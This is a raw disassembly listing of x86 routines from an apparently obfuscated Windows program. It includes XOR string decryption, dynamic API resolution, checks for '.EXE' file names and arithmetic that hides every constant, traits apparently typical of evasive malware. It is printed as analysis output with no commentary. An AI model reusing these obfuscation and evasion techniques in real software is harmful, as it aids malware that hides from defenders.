loc_41E1C5: ; CODE XREF: sub_41E19D+2D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E1C5
movsx ebx, word ptr ds:10013240h
movsx edx, word ptr ds:100131C0h
add ebx, edx
sub ebx, 5
mov esi, eax
sub esi, ebx
movsx ebx, word ptr ds:100130FCh
movsx edx, word ptr ds:10013160h
add ebx, edx
sub ebx, 7
mov [ebp+esi+var_12104], bl
push 0
mov eax, ds:100131E8h
add eax, ds:100130B8h
sub eax, 4
push eax
push 3
push 0
mov eax, ds:100130A0h
movsx edx, word ptr ds:100131B4h
add eax, edx
sub eax, 8
push eax
push 80000001h
lea eax, [ebp+var_12104]
push eax
call dword ptr ds:10012788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_41E473
push 0
lea eax, [ebp+var_12110]
push eax
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push edi
call dword ptr ds:1000D028h
mov [ebp+var_12108], eax
push edi
call dword ptr ds:10011654h
mov eax, ds:100131D0h
sub eax, 7
cmp [ebp+var_12108], eax
jz loc_41E473
cmp [ebp+var_1FFF], 4Ch
jnz loc_41E473
movzx esi, [ebp+var_1FB3]
movzx ebx, [ebp+var_1FB2]
movzx ebx, bx
shl ebx, 8
or esi, ebx
mov [ebp+var_1210A], si
movzx eax, [ebp+var_1210A]
movsx edx, word ptr ds:10013264h
mov ecx, ds:100131E4h
lea edx, [edx+ecx+3Fh]
add eax, edx
movsx edx, word ptr ds:10013150h
add edx, ds:1001310Ch
sub edx, 0Ch
add eax, edx
mov [ebp+var_12000], ax
movzx eax, [ebp+var_12000]
movsx eax, [ebp+eax+var_1FFF]
mov edx, ds:1001326Ch
sub edx, 9
cmp eax, edx
jz loc_41E473
movzx eax, [ebp+var_12000]
movsx edx, word ptr ds:100130BCh
dec edx
add eax, edx
movsx eax, [ebp+eax+var_1FFF]
mov edx, ds:1001313Ch
sub edx, 2
cmp eax, edx
jnz loc_41E473
movzx eax, [ebp+var_12000]
mov edx, ds:10013268h
add edx, 0Ch
mov ecx, eax
add ecx, edx
movzx edx, [ebp+ecx+var_1FFF]
movsx esi, word ptr ds:100131FCh
lea esi, [eax+esi+0Ch]
movzx esi, [ebp+esi+var_1FFF]
movzx esi, si
shl esi, 8
mov ebx, edx
or ebx, esi
mov esi, ebx
movzx esi, si
mov ebx, eax
add ebx, esi
mov esi, ebx
mov [ebp+var_1210C], si
movzx eax, [ebp+var_1210C]
lea eax, [ebp+eax+var_1FFF]
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_425399
lea ecx, [ebp+var_11FFE]
or eax, 0FFFFFFFFh
loc_41E394: ; CODE XREF: sub_41E19D+1FC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E394
mov edi, eax
movsx eax, word ptr ds:10013100h
add eax, ds:10013228h
sub eax, 2
mov edx, edi
sub edx, eax
cmp [ebp+edx+var_11FFE], 2Eh
jnz short loc_41E438
mov eax, ds:100130C8h
movsx edx, word ptr ds:10013218h
add eax, edx
sub eax, 2
mov edx, edi
sub edx, eax
movsx eax, [ebp+edx+var_11FFE]
push eax
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 45h
jnz short loc_41E438
mov esi, ds:100131E8h
movsx ebx, word ptr ds:10013230h
add esi, ebx
sub esi, 5
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 58h
jnz short loc_41E438
mov esi, ds:10013158h
sub esi, 8
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 45h
jz short loc_41E43A
loc_41E438: ; CODE XREF: sub_41E19D+21C�j
; sub_41E19D+248�j ...
jmp short loc_41E473
; ---------------------------------------------------------------------------
loc_41E43A: ; CODE XREF: sub_41E19D+299�j
push 10014238h
call sub_41E914
push eax
lea edi, [ebp+var_11FFE]
push edi
call dword ptr ds:1000D020h
mov eax, ds:10013168h
movsx edx, word ptr ds:100131A4h
add eax, edx
sub eax, 7
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_4226A9
add esp, 14h
loc_41E473: ; CODE XREF: sub_41E19D+9E�j
; sub_41E19D+DB�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41E19D endp
; ---------------------------------------------------------------------------
dd 4001B8h, 18C280h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E480 proc near ; CODE XREF: .data:loc_41A96F�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, ds:100130A0h
sub eax, 4
push eax
push 0
push 20h
push 0
call dword ptr ds:1000FA44h
lea eax, [ebp+var_10]
push eax
call dword ptr ds:1001025Ch
movzx eax, [ebp+var_6]
movzx edx, [ebp+var_8]
mov ecx, ds:10013274h
add ecx, 33h
add ecx, ds:100131ECh
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_A]
mov ecx, ds:100131ACh
add ecx, 0Ch
movsx ebx, word ptr ds:1001322Ch
add ecx, ebx
imul edx, ecx
mov ecx, ds:100130F4h
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_E]
mov ecx, ds:1001309Ch
add ecx, 19h
imul edx, ecx
movsx ecx, word ptr ds:100131FCh
add ecx, 13h
imul edx, ecx
mov ecx, ds:100131F8h
add ecx, 39h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_10]
movsx ecx, word ptr ds:10013104h
movsx ebx, word ptr ds:10013260h
lea ecx, [ecx+ebx+2]
imul edx, ecx
mov ecx, ds:1001311Ch
add ecx, 16h
add ecx, ds:10013090h
imul edx, ecx
mov ecx, ds:10013268h
add ecx, 0Eh
movsx ebx, word ptr ds:10013144h
add ecx, ebx
imul edx, ecx
mov ecx, ds:10013110h
add ecx, 37h
add ecx, ds:10013238h
imul edx, ecx
add eax, edx
mov ds:1000D024h, eax
mov eax, ds:100130E4h
sub eax, 8
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_41DE82
add esp, 144h
pop edi
pop esi
pop ebx
leave
retn
sub_41E480 endp
; ---------------------------------------------------------------------------
dd 4001B8h, 8C280h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 1000F608h
call dword ptr ds:1000FA3Ch
mov eax, ds:1000F608h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41E5D3 proc near ; CODE XREF: .data:00421046�p
push edi
push 10014228h
call sub_41E914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132B8h, eax
test eax, eax
jnz short loc_41E606
push 10014218h
call sub_41E914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132B8h, eax
loc_41E606: ; CODE XREF: sub_41E5D3+1A�j
push 10014207h
call sub_41E914
push eax
push dword ptr ds:100132B8h
call dword ptr ds:1000F1F8h
mov ds:1000F5ECh, eax
push 100141F3h
call sub_41E914
push eax
push dword ptr ds:100132B8h
call dword ptr ds:1000F1F8h
mov ds:1000D03Ch, eax
push 100141E4h
call sub_41E914
push eax
push dword ptr ds:100132B8h
call dword ptr ds:1000F1F8h
mov ds:10012618h, eax
push 100141D4h
call sub_41E914
add esp, 10h
push eax
push dword ptr ds:100132B8h
call dword ptr ds:1000F1F8h
mov ds:1000F5F0h, eax
pop edi
retn
sub_41E5D3 endp
; =============== S U B R O U T I N E =======================================
sub_41E67B proc near ; CODE XREF: .data:00421041�p
push edi
push 100141C5h
call sub_41E914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132B4h, eax
test eax, eax
jnz short loc_41E6AE
push 100141B6h
call sub_41E914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132B4h, eax
loc_41E6AE: ; CODE XREF: sub_41E67B+1A�j
push 100141A2h
call sub_41E914
pop ecx
push eax
push dword ptr ds:100132B4h
call dword ptr ds:1000F1F8h
mov ds:1000FA44h, eax
pop edi
retn
sub_41E67B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E6CD proc near ; CODE XREF: sub_41D354+26D�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_41E6E4
add eax, 3Fh
loc_41E6E4: ; CODE XREF: sub_41E6CD+12�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_41C4FB
pop ecx
mov [ebp+var_14], eax
mov edi, [ebp+arg_4]
mov edx, ds:10013248h
add edx, 3Ch
add edx, ds:10013270h
mov eax, edi
add eax, edx
jge short loc_41E711
add eax, 3Fh
loc_41E711: ; CODE XREF: sub_41E6CD+3F�j
sar eax, 6
mov edi, ds:10013288h
add edi, 3Ah
mov edx, eax
imul edx, edi
push edx
push [ebp+var_14]
call dword ptr ds:1000D02Ch
push [ebp+arg_4]
push esi
push [ebp+var_14]
call dword ptr ds:10011638h
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call sub_424A6F
mov esi, [ebp+var_14]
mov ebx, ds:10013184h
sub ebx, 2
jmp short loc_41E76F
; ---------------------------------------------------------------------------
loc_41E753: ; CODE XREF: sub_41E6CD+BC�j
push esi
lea eax, [ebp+var_10]
push eax
call sub_424A96
mov eax, ds:100131E8h
add eax, 39h
add eax, ds:1001314Ch
lea esi, [esi+eax]
inc ebx
loc_41E76F: ; CODE XREF: sub_41E6CD+84�j
mov edi, [ebp+arg_4]
movsx edx, word ptr ds:10013170h
lea eax, [edi+edx+3Eh]
test eax, eax
jge short loc_41E784
add eax, 3Fh
loc_41E784: ; CODE XREF: sub_41E6CD+B2�j
sar eax, 6
cmp ebx, eax
jl short loc_41E753
push [ebp+var_14]
call sub_41A731
lea eax, [ebp+var_54]
push eax
push [ebp+arg_8]
call sub_41C1D1
movsx eax, word ptr ds:100130B0h
add eax, 9
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
call dword ptr ds:1001264Ch
add esp, 18h
movsx edi, word ptr ds:10013144h
add edi, ds:1001314Ch
sub edi, 0Ch
cmp eax, edi
jz short loc_41E7D4
xor eax, eax
inc eax
jmp short loc_41E7D6
; ---------------------------------------------------------------------------
loc_41E7D4: ; CODE XREF: sub_41E6CD+100�j
xor eax, eax
loc_41E7D6: ; CODE XREF: sub_41E6CD+105�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E6CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E7DB proc near ; CODE XREF: sub_421596+197�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
mov eax, ds:10013280h
movsx edx, word ptr ds:10013100h
add eax, edx
sub eax, 7
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword ptr ds:1000F5ECh
mov edi, eax
or edi, edi
jz short loc_41E811
xor eax, eax
jmp short loc_41E83E
; ---------------------------------------------------------------------------
loc_41E811: ; CODE XREF: sub_41E7DB+30�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call dword ptr ds:1000D03Ch
mov edi, eax
push [ebp+var_4]
call dword ptr ds:10012618h
or edi, edi
jz short loc_41E83B
xor eax, eax
jmp short loc_41E83E
; ---------------------------------------------------------------------------
loc_41E83B: ; CODE XREF: sub_41E7DB+5A�j
xor eax, eax
inc eax
loc_41E83E: ; CODE XREF: sub_41E7DB+34�j
; sub_41E7DB+5E�j
pop edi
leave
retn
sub_41E7DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E841 proc near ; CODE XREF: sub_41A999+DA�p
; sub_41A999+510�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
push ebx
call dword ptr ds:1000D000h
mov edi, eax
push 0
push 0
movsx eax, word ptr ds:100130CCh
add eax, 1FF8h
push eax
push esi
push edi
push ebx
mov eax, ds:1001312Ch
add eax, ds:10013194h
sub eax, 11h
push eax
push 0
call dword ptr ds:1000D00Ch
mov eax, ds:1001319Ch
add eax, ds:1001321Ch
sub eax, 0Eh
mov [esi+edi], al
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41E841 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 10014AC8h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_41E8C5
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41E90D
; ---------------------------------------------------------------------------
loc_41E8C5: ; CODE XREF: .data:0041E8B3�j
push 10014A48h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_41E8E5
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41E90D
; ---------------------------------------------------------------------------
loc_41E8E5: ; CODE XREF: .data:0041E8D3�j
push 10014A08h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_41E905
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41E90D
; ---------------------------------------------------------------------------
loc_41E905: ; CODE XREF: .data:0041E8F3�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_41E90D: ; CODE XREF: .data:0041E8C3�j
; .data:0041E8E3�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E914 proc near ; CODE XREF: sub_41A999+298�p
; sub_41A999+38B�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword ptr ds:10013290h, 0
jnz short loc_41E93C
push 10012BC0h
call dword ptr ds:1000E008h
mov dword ptr ds:10013290h, 1
loc_41E93C: ; CODE XREF: sub_41E914+11�j
movsx esi, word ptr ds:100131F0h
movsx ebx, word ptr ds:100130CCh
add esi, ebx
sub esi, 7
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+1]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
cmp eax, ds:100130B8h
jz short loc_41E9EF
push 10012BC0h
call dword ptr ds:10012660h
mov eax, ds:10013220h
dec eax
mov [ebp+var_2], ax
jmp short loc_41E99F
; ---------------------------------------------------------------------------
loc_41E98A: ; CODE XREF: sub_41E914+95�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+2]
xor edx, ecx
mov [eax], dl
inc [ebp+var_2]
loc_41E99F: ; CODE XREF: sub_41E914+74�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_41E98A
movsx eax, word ptr ds:10013170h
sub eax, 2
mov edx, ds:100130F8h
add edx, ds:1001312Ch
sub edx, 0Fh
mov [edi+eax], dl
mov eax, ds:10013128h
sub eax, 8
mov edx, ds:1001325Ch
movsx ecx, word ptr ds:100131F0h
add edx, ecx
sub edx, 0Bh
mov [edi+eax], dl
push 10012BC0h
call dword ptr ds:10011650h
loc_41E9EF: ; CODE XREF: sub_41E914+5D�j
lea eax, [edi+3]
pop edi
pop esi
pop ebx
leave
retn
sub_41E914 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E9F7 proc near ; CODE XREF: sub_422477+E�p
; sub_422477+1E1�p
var_10088 = dword ptr -10088h
var_10084 = dword ptr -10084h
var_10080 = dword ptr -10080h
var_1007C = dword ptr -1007Ch
var_10078 = word ptr -10078h
var_10070 = dword ptr -10070h
var_10068 = dword ptr -10068h
var_10064 = dword ptr -10064h
var_10060 = dword ptr -10060h
var_10059 = byte ptr -10059h
var_10058 = dword ptr -10058h
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10048 = dword ptr -10048h
var_10043 = byte ptr -10043h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10088h
call sub_425379
push ebx
push esi
push edi
mov [ebp+var_40], 8
push 10014194h
call sub_421B74
pop ecx
push eax
call dword ptr ds:1000D044h
mov [ebp+var_38], eax
lea eax, [ebp+var_2C]
push eax
lea esi, [ebp+var_40]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word ptr ds:100130FCh
add eax, ds:10013154h
sub eax, 0Dh
cmp ebx, eax
jz short loc_41EA5B
xor eax, eax
jmp loc_41F087
; ---------------------------------------------------------------------------
loc_41EA5B: ; CODE XREF: sub_41E9F7+5B�j
lea eax, [ebp+var_24]
push eax
push 10014A68h
mov eax, [ebp+var_2C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10013208h
add eax, ds:1001314Ch
sub eax, 0Bh
cmp ebx, eax
jnz loc_41F07C
lea eax, [ebp+var_28]
push eax
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, ds:10013090h
movsx edx, word ptr ds:10013170h
add eax, edx
sub eax, 5
cmp ebx, eax
jnz loc_41F073
and [ebp+var_44], 0
movsx eax, word ptr ds:10013264h
sub eax, 9
mov [ebp+var_1C], eax
jmp loc_41F067
; ---------------------------------------------------------------------------
loc_41EAC9: ; CODE XREF: sub_41E9F7+676�j
mov [ebp+var_18], 2
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
lea eax, [ebp+var_4]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_24]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, ds:1001325Ch
add eax, ds:10013188h
sub eax, 8
cmp ebx, eax
jnz loc_41F064
and [ebp+var_10048], 0
lea eax, [ebp+var_10048]
push eax
push 10014A78h
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:100130A4h
movsx edx, word ptr ds:100131C0h
add eax, edx
sub eax, 0Ah
cmp ebx, eax
jnz loc_41F040
cmp [ebp+var_10048], 0
jz loc_41F040
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_10048]
push eax
mov edi, [eax]
call dword ptr [edi+0F8h]
mov ebx, eax
or ebx, ebx
jnz loc_41F040
lea eax, [ebp+var_10043]
push eax
push [ebp+var_20]
call sub_41E841
mov eax, ds:10013288h
sub eax, 5
push eax
push 10010230h
lea eax, [ebp+var_10043]
push eax
call sub_41A8C2
add esp, 14h
mov edi, ds:10013280h
add edi, 0FFFBh
cmp eax, edi
jz loc_41F040
cmp [ebp+arg_4], 0
jz short loc_41EBE2
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
inc eax
jmp loc_41F087
; ---------------------------------------------------------------------------
loc_41EBE2: ; CODE XREF: sub_41E9F7+1CC�j
and [ebp+var_1007C], 0
lea eax, [ebp+var_1007C]
push eax
push 10014A98h
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013184h
movsx edx, word ptr ds:10013240h
add eax, edx
sub eax, 4
cmp ebx, eax
jnz loc_41F040
mov [ebp+var_10059], 44h
push 1001418Bh
call sub_41E914
movsx edi, word ptr ds:100130D8h
dec edi
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_41A8C2
add esp, 10h
movsx esi, word ptr ds:100130CCh
add esi, 0FFF8h
cmp eax, esi
jz short loc_41EC5F
mov [ebp+var_10059], 43h
loc_41EC5F: ; CODE XREF: sub_41E9F7+25F�j
push 10014183h
call sub_41E914
movsx edi, word ptr ds:100131FCh
sub edi, 4
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_41A8C2
add esp, 10h
mov esi, ds:100130DCh
inc esi
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_41EC9B: ; CODE XREF: sub_41E9F7+2BA�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_41ECB3
inc [ebp+var_10054]
jmp short loc_41EC9B
; ---------------------------------------------------------------------------
loc_41ECB3: ; CODE XREF: sub_41E9F7+2B2�j
mov eax, [ebp+var_10054]
movsx edx, word ptr ds:10013150h
movsx ecx, word ptr ds:100131F0h
add edx, ecx
sub edx, 0Bh
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call dword ptr ds:1000D054h
mov [ebp+var_10080], eax
push 1001417Ch
call sub_41E914
movsx edi, word ptr ds:1001322Ch
movsx esi, word ptr ds:10013260h
add edi, esi
sub edi, 8
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_41A8C2
add esp, 14h
mov esi, ds:10013214h
sub esi, 6
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_41ED34: ; CODE XREF: sub_41E9F7+353�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_41ED4C
inc [ebp+var_10054]
jmp short loc_41ED34
; ---------------------------------------------------------------------------
loc_41ED4C: ; CODE XREF: sub_41E9F7+34B�j
mov eax, [ebp+var_10054]
mov edx, ds:10013238h
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call dword ptr ds:1000D054h
pop ecx
mov [ebp+var_10060], eax
movsx eax, word ptr ds:10013118h
sub eax, 3
cmp [ebp+var_10080], eax
ja short loc_41EDF9
movsx eax, word ptr ds:1001322Ch
add eax, ds:1001326Ch
sub eax, 10h
mov [ebp+var_1004C], eax
jmp short loc_41EDE5
; ---------------------------------------------------------------------------
loc_41EDA4: ; CODE XREF: sub_41E9F7+400�j
mov edi, [ebp+var_1004C]
mov esi, edi
shl esi, 2
cmp dword ptr ds:1000E130h[esi], 0
jz short loc_41EDDF
mov edx, [ebp+var_10060]
cmp ds:1000D060h[esi], edx
jnz short loc_41EDDF
mov dl, ds:1000F200h[edi]
cmp dl, [ebp+var_10059]
jnz short loc_41EDDF
and dword ptr ds:1000E130h[edi*4], 0
loc_41EDDF: ; CODE XREF: sub_41E9F7+3C0�j
; sub_41E9F7+3CF�j ...
inc [ebp+var_1004C]
loc_41EDE5: ; CODE XREF: sub_41E9F7+3AB�j
movsx eax, word ptr ds:10013178h
add eax, 3E4h
cmp [ebp+var_1004C], eax
jb short loc_41EDA4
loc_41EDF9: ; CODE XREF: sub_41E9F7+393�j
call dword ptr ds:10012770h
mov [ebp+var_10064], eax
mov eax, ds:10013280h
sub eax, 4
mov [ebp+var_10050], eax
jmp short loc_41EE66
; ---------------------------------------------------------------------------
loc_41EE15: ; CODE XREF: sub_41E9F7+47F�j
mov edi, [ebp+var_10050]
shl edi, 2
cmp dword ptr ds:1000E130h[edi], 0
jz short loc_41EE60
mov edi, ds:10011660h[edi]
movsx esi, word ptr ds:10013104h
add esi, 0EA58h
mov edx, ds:10013134h
sub edx, 3
imul esi, edx
add edi, esi
cmp edi, [ebp+var_10064]
jnb short loc_41EE60
mov edi, [ebp+var_10050]
and dword ptr ds:1000E130h[edi*4], 0
loc_41EE60: ; CODE XREF: sub_41E9F7+42F�j
; sub_41E9F7+459�j
inc [ebp+var_10050]
loc_41EE66: ; CODE XREF: sub_41E9F7+41C�j
mov eax, ds:10013200h
add eax, 3E3h
cmp [ebp+var_10050], eax
jb short loc_41EE15
movsx eax, word ptr ds:10013264h
movsx edx, word ptr ds:10013180h
add eax, edx
sub eax, 0Dh
mov [ebp+var_10058], eax
jmp short loc_41EEA9
; ---------------------------------------------------------------------------
loc_41EE93: ; CODE XREF: sub_41E9F7+4C2�j
mov edi, [ebp+var_10058]
cmp dword ptr ds:1000E130h[edi*4], 0
jz short loc_41EEBB
inc [ebp+var_10058]
loc_41EEA9: ; CODE XREF: sub_41E9F7+49A�j
mov eax, ds:1001320Ch
add eax, 3E2h
cmp [ebp+var_10058], eax
jb short loc_41EE93
loc_41EEBB: ; CODE XREF: sub_41E9F7+4AA�j
mov edi, [ebp+var_10058]
mov esi, [ebp+var_10060]
mov ds:1000D060h[edi*4], esi
mov eax, edi
mov dl, [ebp+var_10059]
mov ds:1000F200h[eax], dl
movsx eax, word ptr ds:10013100h
sub eax, 3
cmp [ebp+var_10080], eax
jbe loc_41EF90
movsx esi, word ptr ds:100130B0h
add esi, 0FFF8h
mov ds:1000FA50h[edi*2], si
mov eax, ds:10013204h
dec eax
mov [ebp+var_10088], eax
jmp short loc_41EF73
; ---------------------------------------------------------------------------
loc_41EF16: ; CODE XREF: sub_41E9F7+595�j
mov edi, [ebp+var_10088]
mov esi, edi
shl esi, 2
cmp dword ptr ds:1000E130h[esi], 0
jz short loc_41EF6D
movzx edx, word ptr ds:1000FA50h[edi*2]
mov ecx, ds:10013284h
add ecx, 0FFF6h
cmp edx, ecx
jz short loc_41EF6D
mov edx, [ebp+var_10060]
cmp ds:1000D060h[esi], edx
jnz short loc_41EF6D
mov dl, ds:1000F200h[edi]
cmp dl, [ebp+var_10059]
jnz short loc_41EF6D
lea edi, ds:1000FA50h[edi*2]
inc word ptr [edi]
jmp short loc_41EFA7
; ---------------------------------------------------------------------------
loc_41EF6D: ; CODE XREF: sub_41E9F7+532�j
; sub_41E9F7+54A�j ...
inc [ebp+var_10088]
loc_41EF73: ; CODE XREF: sub_41E9F7+51D�j
mov eax, ds:100131F4h
add eax, 3DEh
movsx edx, word ptr ds:10013230h
add eax, edx
cmp [ebp+var_10088], eax
jb short loc_41EF16
jmp short loc_41EFA7
; ---------------------------------------------------------------------------
loc_41EF90: ; CODE XREF: sub_41E9F7+4F6�j
mov edi, [ebp+var_10058]
mov esi, ds:10013284h
sub esi, 8
mov ds:1000FA50h[edi*2], si
loc_41EFA7: ; CODE XREF: sub_41E9F7+574�j
; sub_41E9F7+597�j
call dword ptr ds:10012770h
mov edi, [ebp+var_10058]
mov ds:10011660h[edi*4], eax
lea esi, ds:10013354h
mov ds:1000E130h[edi*4], esi
mov edi, [ebp+var_10058]
lea edi, ds:1000E130h[edi*4]
mov [ebp+var_10084], edi
mov eax, edi
push eax
mov esi, [eax]
call dword ptr [esi+4]
mov [ebp+var_10078], 9
mov edi, [ebp+var_10058]
lea edi, ds:1000E130h[edi*4]
mov [ebp+var_10070], edi
lea esi, [ebp+var_10078]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_1007C]
push edi
mov edi, [edi]
call dword ptr [edi+0A4h]
mov ebx, eax
inc [ebp+var_10058]
lea eax, [ebp+var_10078]
push eax
call dword ptr ds:10012BB0h
mov eax, [ebp+var_1007C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41F040: ; CODE XREF: sub_41E9F7+158�j
; sub_41E9F7+165�j ...
cmp [ebp+var_10048], 0
jz short loc_41F055
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41F055: ; CODE XREF: sub_41E9F7+650�j
cmp [ebp+var_4], 0
jz short loc_41F064
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41F064: ; CODE XREF: sub_41E9F7+11B�j
; sub_41E9F7+662�j
inc [ebp+var_1C]
loc_41F067: ; CODE XREF: sub_41E9F7+CD�j
mov eax, [ebp+var_28]
cmp [ebp+var_1C], eax
jb loc_41EAC9
loc_41F073: ; CODE XREF: sub_41E9F7+B6�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41F07C: ; CODE XREF: sub_41E9F7+8E�j
mov eax, [ebp+var_2C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
loc_41F087: ; CODE XREF: sub_41E9F7+5F�j
; sub_41E9F7+1E6�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E9F7 endp
; ---------------------------------------------------------------------------
